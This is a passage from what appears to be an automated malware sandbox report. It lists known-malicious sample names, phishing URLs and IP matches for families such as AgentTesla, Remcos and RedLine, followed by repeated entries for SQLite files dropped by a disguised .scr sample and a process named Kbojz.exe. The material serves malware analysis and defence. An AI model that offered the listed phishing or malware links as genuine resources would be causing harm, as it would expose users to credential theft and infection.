                                                                                                                                                  disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                  • 13.107.139.11
                                                                                                                                                  https://1drv.ms/o/s!AhT23e1MofOfpnjbpE9m51fOcII5?e=K3DPPGGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSul5RjxwWTK.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 20.1.13.62
                                                                                                                                                  order.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 52.109.6.53
                                                                                                                                                  https://diversityjobs.com/employer/company/1665/Worthington-Industries-IncGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 52.162.201.54
                                                                                                                                                  mCS7AR9pKm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                  • 20.174.35.247
                                                                                                                                                  SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 13.107.246.40
                                                                                                                                                  https://jll2.sharepoint.com/:f:/t/WorkplaceStrategy274/EqyxzpLxD8lEhSn1hXMNtKMBbmoik8-xeuIbHrYk7cgngA?e=5%3a2wyFQq&at=9&xsdata=MDV8MDJ8cGF0cmljaWEucmliZWlyb0Bub3ZvYmFuY28ucHR8NjlmMTdkMWU5YzBjNDFkN2UwZmIwOGRjNTNjN2YwZTV8MTAzMzgwNDgxOTNhNDI5OGFiZWEzNTk2YWU4OGIwNWV8MHwwfDYzODQ3NzM2NTQwMjI0OTQwNXxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18MHx8fA%3d%3d&sdata=T2RkZHdHdHpwUXkxSG5Kd2Noc1RHVUc3YVNLVE1sOWZUTXdVZitYYXh6Yz0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 13.107.136.10
                                                                                                                                                  http://monacolife.netGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 13.107.246.41
                                                                                                                                                  https://www.joesandbox.com/loginGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 13.107.246.41
                                                                                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSul5RjxwWTK.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 20.1.13.62
                                                                                                                                                  order.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 52.109.6.53
                                                                                                                                                  https://diversityjobs.com/employer/company/1665/Worthington-Industries-IncGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 52.162.201.54
                                                                                                                                                  mCS7AR9pKm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                  • 20.174.35.247
                                                                                                                                                  SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 13.107.246.40
                                                                                                                                                  https://jll2.sharepoint.com/:f:/t/WorkplaceStrategy274/EqyxzpLxD8lEhSn1hXMNtKMBbmoik8-xeuIbHrYk7cgngA?e=5%3a2wyFQq&at=9&xsdata=MDV8MDJ8cGF0cmljaWEucmliZWlyb0Bub3ZvYmFuY28ucHR8NjlmMTdkMWU5YzBjNDFkN2UwZmIwOGRjNTNjN2YwZTV8MTAzMzgwNDgxOTNhNDI5OGFiZWEzNTk2YWU4OGIwNWV8MHwwfDYzODQ3NzM2NTQwMjI0OTQwNXxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18MHx8fA%3d%3d&sdata=T2RkZHdHdHpwUXkxSG5Kd2Noc1RHVUc3YVNLVE1sOWZUTXdVZitYYXh6Yz0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 13.107.136.10
                                                                                                                                                  http://monacolife.netGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 13.107.246.41
                                                                                                                                                  https://www.joesandbox.com/loginGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 13.107.246.41
                                                                                                                                                  CHELYABINSK-SIGNAL-ASRU#U7535#U5b50#U53d1#U79682039920102-2022.jpg.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 80.85.156.131
                                                                                                                                                  https://pub-c703dadea8164d9790f4641e531245a0.r2.dev/killarhDOC.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 80.85.152.20
                                                                                                                                                  file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                  • 80.85.152.116
                                                                                                                                                  file.exeGet hashmaliciousBabuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar, XmrigBrowse
                                                                                                                                                  • 80.85.156.25
                                                                                                                                                  pYJ4V8A183.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 185.144.31.89
                                                                                                                                                  0017062].exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                                                                                  • 80.85.153.111
                                                                                                                                                  wLZpYyx233.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                  • 80.85.152.191
                                                                                                                                                  LD1VgkLeoa.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                  • 80.85.153.152
                                                                                                                                                  DOCUMENTS.batGet hashmaliciousRedLineBrowse
                                                                                                                                                  • 80.85.157.78
                                                                                                                                                  oypmPkcmDj.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                  • 80.85.157.78
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  7dcce5b76c8b17472d024758970a406bInvoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  TransactionSummary_910020049836765_110424045239.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  rks18.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  NEW ORDER.docGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  yDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  DETAILS.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  36f7277af969a6947a61ae0b815907a1TransactionSummary_910020049836765_110424045239.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  msXkgFIUyS.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  BANK LETTER.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  NEW GRACE- RFQ .docGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  78YW3Fcvv0.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  Booking copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  Dados Da Reserva.ppamGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  Request_For_ Quotation.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  RFQ.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  302814Q.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  No context
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):77824
                                                                                                                                                  Entropy (8bit):1.133993246026424
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                                                                                  MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                                                                                  SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                                                                                  SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                                                                                  SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20480
                                                                                                                                                  Entropy (8bit):1.3870145383915669
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                                                                                                                  MD5:1623709C6B2FB813984B1265C26A85F1
                                                                                                                                                  SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                                                                                                                  SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                                                                                                                  SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  File Type:SQLite 3.x database, user version 35, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 3, database pages 35, cookie 0x1d, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1146880
                                                                                                                                                  Entropy (8bit):0.15644146423012004
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CdEcZ6zssdySB+exixS4fS4QS4NS4ibRqwxeKlZfTOmPp80WOpp:+EccZdD3yJnbkw0KlAo5H
                                                                                                                                                  MD5:E28514A583D6F83F8C67CA62CB891CA7
                                                                                                                                                  SHA1:4107934697F0891B26B16A6E0D9795271353355C
                                                                                                                                                  SHA-256:B41E251C18B2B1CDD79E33F0B3AB12EAD8EF257969E26BFBB06DB7C70E9E0FFC
                                                                                                                                                  SHA-512:BF83CD24FEA896D38F07EA61FA639FCE7CC637AB97C6DFE5A6502772DECC4835160F5F49442266024B6564947B0AFB72901A8B1C848AF00808F0A3E08B740E4E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:SQLite format 3......@ .......#...............................#.................................-...}.."l..~\}.|.}M{.|az.y.zdyqx.y8w.xJviu.t.tNs.sxs.r.r.q.p.pwp.o.n.nym.mRl.l.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40960
                                                                                                                                                  Entropy (8bit):0.7798653713156546
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                                                                                                                  MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                                                                                                                  SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                                                                                                                  SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                                                                                                                  SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20480
                                                                                                                                                  Entropy (8bit):1.3870145383915669
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                                                                                                                  MD5:1623709C6B2FB813984B1265C26A85F1
                                                                                                                                                  SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                                                                                                                  SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                                                                                                                  SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):122880
                                                                                                                                                  Entropy (8bit):1.4530338001328815
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
                                                                                                                                                  MD5:9DEFC75D6086CCDBE05ED9EE2159CF84
                                                                                                                                                  SHA1:BCF6B1893581F2420564160F784E47E91946269A
                                                                                                                                                  SHA-256:04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
                                                                                                                                                  SHA-512:D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40960
                                                                                                                                                  Entropy (8bit):0.7798653713156546
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                                                                                                                  MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                                                                                                                  SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                                                                                                                  SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                                                                                                                  SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20480
                                                                                                                                                  Entropy (8bit):1.3870145383915669
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                                                                                                                  MD5:1623709C6B2FB813984B1265C26A85F1
                                                                                                                                                  SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                                                                                                                  SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                                                                                                                  SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):122880
                                                                                                                                                  Entropy (8bit):1.4530338001328815
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
                                                                                                                                                  MD5:9DEFC75D6086CCDBE05ED9EE2159CF84
                                                                                                                                                  SHA1:BCF6B1893581F2420564160F784E47E91946269A
                                                                                                                                                  SHA-256:04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
                                                                                                                                                  SHA-512:D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):77824
                                                                                                                                                  Entropy (8bit):1.133993246026424
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                                                                                  MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                                                                                  SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                                                                                  SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                                                                                  SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  File Type:SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):131072
                                                                                                                                                  Entropy (8bit):0.07093764277882578
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
                                                                                                                                                  MD5:37F03D0EB1744FFEBCF26E3DB4A4280F
                                                                                                                                                  SHA1:0B120B18B36AD6A64C27D3845A5871D10568C92E
                                                                                                                                                  SHA-256:4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
                                                                                                                                                  SHA-512:49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-.......}..~!..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):122880
                                                                                                                                                  Entropy (8bit):1.4530338001328815
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
                                                                                                                                                  MD5:9DEFC75D6086CCDBE05ED9EE2159CF84
                                                                                                                                                  SHA1:BCF6B1893581F2420564160F784E47E91946269A
                                                                                                                                                  SHA-256:04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
                                                                                                                                                  SHA-512:D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):131072
                                                                                                                                                  Entropy (8bit):0.07093764277882578
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
                                                                                                                                                  MD5:37F03D0EB1744FFEBCF26E3DB4A4280F
                                                                                                                                                  SHA1:0B120B18B36AD6A64C27D3845A5871D10568C92E
                                                                                                                                                  SHA-256:4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
                                                                                                                                                  SHA-512:49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-.......}..~!..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):122880
                                                                                                                                                  Entropy (8bit):1.4530338001328815
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
                                                                                                                                                  MD5:9DEFC75D6086CCDBE05ED9EE2159CF84
                                                                                                                                                  SHA1:BCF6B1893581F2420564160F784E47E91946269A
                                                                                                                                                  SHA-256:04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
                                                                                                                                                  SHA-512:D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):122880
                                                                                                                                                  Entropy (8bit):1.4530338001328815
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
                                                                                                                                                  MD5:9DEFC75D6086CCDBE05ED9EE2159CF84
                                                                                                                                                  SHA1:BCF6B1893581F2420564160F784E47E91946269A
                                                                                                                                                  SHA-256:04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
                                                                                                                                                  SHA-512:D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):77824
                                                                                                                                                  Entropy (8bit):1.133993246026424
